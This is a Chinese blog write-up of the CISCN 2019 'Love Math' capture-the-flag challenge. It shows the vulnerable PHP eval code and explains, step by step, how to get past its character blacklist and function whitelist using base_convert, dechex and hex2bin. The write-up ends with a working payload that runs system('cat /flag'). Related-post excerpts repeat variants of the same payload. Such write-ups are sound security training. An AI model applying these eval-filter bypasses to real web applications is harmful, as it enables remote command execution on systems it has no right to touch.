web buuctf [CISCN 2019 初赛]Love Math

最新推荐文章于 2023-09-01 17:19:55 发布
最新推荐文章于 2023-09-01 17:19:55 发布
阅读量393 收藏 1
点赞数
文章标签: 动态传参 hex2bin
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/123920357
版权

知识点:hex2bin():将16进制转化为字符串;

             传参漏洞;

1.代码如下

<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

进行代码审计,最后的函数va是el,说明在content传的参数,是要执行的命令,比如system(ls)

2.根据代码,给出了黑名单和白名单,

其中关于白名单的正则匹配'[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*':

PHP 中的变量用一个美元符号后面跟变量名来表示。变量名是区分大小写的。

变量名与 PHP 中其它的标签一样遵循相同的规则。一个有效的变量名由字母或者下划线开头,后面跟上任意数量的字母,数字,或者下划线。按照正常的正则表达式,它将被表述为:'[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*'。

白名单也在暗示要利用变量传参的模式传递执行命令

3.于是我们构造payload:

?content=$_GET(a)($_GET(b))&a=system&b=ls

4.看看前面的过滤,比较好注入,system啥的都没有过滤,主要是怎么传进去,根据payload和过滤条件,就是对_GET进行转换,利用hex2bin,将_GET的十六进制传到hexbin()的参数里。

5.     我们可以利用白名单里面的base_convert和dechax进行进制转换。

base_convert() 在任意进制之间转换数字。

dechex() 把十进制转换为十六进制。

 因为我们需要用到hex2bin,先对该字符进行转换(进制转换 - 在线工具)

 base_convert(37907361743,10,36)  hex2bin就构造好了.

6.现在就是得到_GET的十六进制了,因为白名单的正则过滤,就要求我们不能有字母+数字这样的组合,而十六进制中是有字母的,所以,我们要得到_GET的十进制

我用的在线工具字符串转16进制_16进制转换、十六进制转换_汇享在线工具箱,最后转成十进制

_GET(10)=1598506324

dechex(1598506324)再转换成16进制

7.[]的绕过可以利用{}

8.所以c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat%20/flag

 

 

flag{c953aaa8-12ec-40de-818d-6d3e90596787}

半杯雨水敬过客
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF】[CISCN 2019 初赛]Love Math
aoao331198的博客
05-05 414
源码 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '
[CISCN 2019 初赛]Love Math
shawdow_bug的博客
06-17 876
能得到任意字符串的无字符串实参payload
[CISCN 2019初赛]Love Math
rev1ve的博客
09-01 1580
简单分析一下,只有一个GET传参参数是c,然后对上传的值进行黑名单检测,接着给了白名单以及常用的数学函数。这个提示很明显了,需要我们用函数进行转换成我们的执行命令。这里最后一个点,就是我们传递的参数值为两个(即一个是函数名 一个是参数),该如何绕过呢。这样的出来,但是这里对我们c的值进行了超多过滤,这里用的是构造出类似。呢,其实目的很明显,因为c的值不能有字母,而我们要想利用。解决方法是用php7的特性,就是可以用变量执行函数。关键点利用php动态函数的特性,比如我们可以构造。,这里需要用到的两个函数是。
2019CSP-S-提高组初赛
08-24
2019CSP-S-提高组初赛
2019CSP-S A卷初赛真题及答案.docx
10-20
【2019 CSP-S 初赛】是中国计算机学会(CCF)组织的计算机软件能力认证的一环,主要面向中学生进行,旨在检验参赛者的计算机程序设计能力。CSP-S,全称为“Certified Software Professional - Software”,是针对...
2019-CSP-J-普及组初赛
06-10
2019-CSP-J-普及组初赛
2019初赛决赛答案解析.pdf
最新发布
04-11
大学生英语竞赛,章节讲解,试题讲解,竞赛题目,试题试卷,题目分析,参考资料,极具学习价值
2019华为网络精英大赛初赛自测习题
04-11
资料总结了官方给的资料的习题总结,完善的列了出来,并且有正确答案,仅供参考。
buuctf日记 [CISCN 2019 初赛]Love Math 1
weixin_45642610的博客
03-06 336
buuctf日记 [CISCN 2019 初赛]Love Math 1 payload c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos})&abs=system&acos=cat /flag base_convert(37907361743,10,36) #把十进制数“37907361743”转为36进制(0-9,a-z) base_convert(37907361743,10,3
buuctf -[CISCN 2019 初赛]lovemath
ANYOUZHEN的博客
06-02 190
打开题目看看 源码分析:这里黑名单过滤了不少东西,常规的cat/flag都不能使用了,这里有个知识点是php中可以把函数名通过字符串的方式传递给一个变量,然后通过此变量动态调用函数比如下面的代码会执行 system(‘cat/flag’)构造传参: 但是这里的_GET和a,b都不是白名单里面的,这里需要替换,其中pi和abs都是白名单里的 我们利用进制间的转换,使用hex2bin()函数,hex2bin()函数把十六进制值的字符串转换为 ASCII字符。 首先将hex2bin转换为十进制
[CISCN 2019 初赛]Love Math 1
shinygod的博客
03-21 722
知识点:各个函数嵌套,进制转换 00x1 这题过滤了很多比如:参数长读为80以下,且里面只能是数学函数,以及一些字符。 我们可以用变量拼接,那么如何拼接呢?我们可以看一下下面这个函数,里面可以有36进制,也就是说我们可以得到任意小写字母,那么我们就可以尝试构造_GET,但是这需要大写字母,而在php中有个hex2bin可以把16进制转换为字符串,可以通过hex2bin来构造_GET。且hex2bin可以这么构造base_convert(37907361743,10,36),意思是把37907361743转
国赛 love_math ----web学习
weixin_44897902的博客
10-14 1718
love_math:(异或,无参数RCE的getallheaders()) 这是源码: <html> <meta charset="utf-8"> </html> <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(...
攻防世界 web高手进阶区 8分题 love_math
闵行小鱼塘
10-03 1057
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是love_math的writeup
[ciscn 2019 初赛]love math
03-16
好的,以下是回复: 这道题目需要我们求出一个数列中所有数的最大公约数。我们可以使用欧几里得算法来求解。具体来说,我们可以用辗转相除的方法,不断将两个数中较大的数除以较小的数,直到两个数相等为止,此时的数即为它们的最大公约数。我们可以用一个循环来实现这个过程,不断更新两个数的值,直到它们相等为止。最后得到的数即为所求的最大公约数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值